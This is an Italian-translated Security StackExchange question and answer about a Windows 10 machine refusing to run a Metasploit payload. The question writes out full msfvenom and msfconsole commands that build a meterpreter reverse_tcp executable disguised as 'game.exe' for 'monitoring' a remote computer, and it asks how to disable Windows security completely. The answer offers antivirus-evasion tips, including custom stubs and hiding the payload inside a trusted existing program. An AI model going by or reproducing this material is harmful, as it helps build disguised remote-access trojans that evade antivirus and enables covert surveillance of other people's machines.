Windows 10 non esegue il payload meterpreter

Naviga le tue risposte
-1

Ho un problema piuttosto complesso nelle mie mani. Recentemente ho avuto l'ambizione di provare nuove funzionalità di Metasploit (su Kali Linux 2017.1). Ho due computer, quindi ho pensato che fosse un ambiente perfetto per la sperimentazione. Il mio "sistema principale" in questo caso era il laptop HP EliteBook 8760w. Sono sorti due problemi:

La mia principale ambizione in entrambi i casi era di monitorare un dispositivo distante attraverso interfacce diverse. Innanzitutto ho cercato di raggiungere il mio obiettivo creando un programma spyware. Ecco la mia procedura: 

root@smerdjakov:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.103 LPORT=8080 -f exe > game.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes
Final size of exe file: 73802 bytes
root@smerdjakov:~# msfconsole

Metasploit Park, System Security Interface
Version 4.0.5, Alpha E

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.0.103
lhost => 192.168.0.103
msf exploit(handler) > set lport 8080
lport => 8080
msf exploit(handler) > exploit -j -z
[*] Exploit running as background job.

[*] Started reverse TCP handler on 192.168.0.103:8080 
[*] Starting the payload handler...
msf exploit(handler) >

A questo punto, tutto è andato come previsto: ho compilato tutte le funzioni, ho ottenuto il file .exe con un carico utile. L'idea principale era quella di eseguire questo programma su un altro computer (con sistema operativo Windows 7/8/10) e il prompt Metasploit avvia automaticamente il monitoraggio del sistema. Tuttavia, quando ho provato a eseguire il mio game.exe come amministratore su Windows 10, questo messaggio è comparso: 

Operation did not complete successfully because a file contains a virus or
potentially unwanted software.

Ho aggiunto un strong livello di crittografia, quindi ho trovato strano che il mio programma non si avvii. Sul mio Kali Linux ho aperto game.exe con Leafpad. Tutto ciò che ho trovato è stato: 

 MZ

È normale? In primo luogo, vorrei sapere come disattivare la sicurezza di Windows completamente e, in secondo luogo, se il mio file game.exe è addirittura funzionale. Dovrei dire che dopo 'MZ' c'è un altro glifo che l'interfaccia di StackExchange non può interpretare: sembra un quadrato con due zeri in cima e un 9 e uno in basso. Ad esempio: 

MZ 0 0
   9 0

Il tuo aiuto è molto apprezzato. Grazie in anticipo.

    
posta Gregor Perčič 16.07.2017 - 15:43
fonte

1 risposta

3

Bene, il problema qui sembra essere un problema di eludere il tuo Windows anti-virus. Poiché l'evasione AV è uno degli argomenti preferiti, permettimi di dare alcuni suggerimenti utili!

-msfvenom fornisce molti codificatori diversi per scrivere i tuoi exploit, tuttavia codificare il tuo file exe più volte non significa che bypasserà l'AV. In pratica gli encoder sono usati per sbarazzarsi di caratteri errati in un carico utile, ecc.

-Il modo migliore per superare il programma anti-virus è scrivere il tuo exe, questo significa creare i propri stub, modelli, ecc. Prova a leggere questo link

-O mio preferito personale, inserisci il tuo payload in un file exe preesistente (forse un programma fidato ..?) dai una lettura link

Buona fortuna

    
risposta data 10.08.2017 - 17:59
fonte

Leggi altre domande sui tag

Parse password deboli basate su file o app del dizionario Perché i siti web insistono sul fatto che i numeri delle carte di credito sono inseriti come un numero di 16 cifre? [chiuso]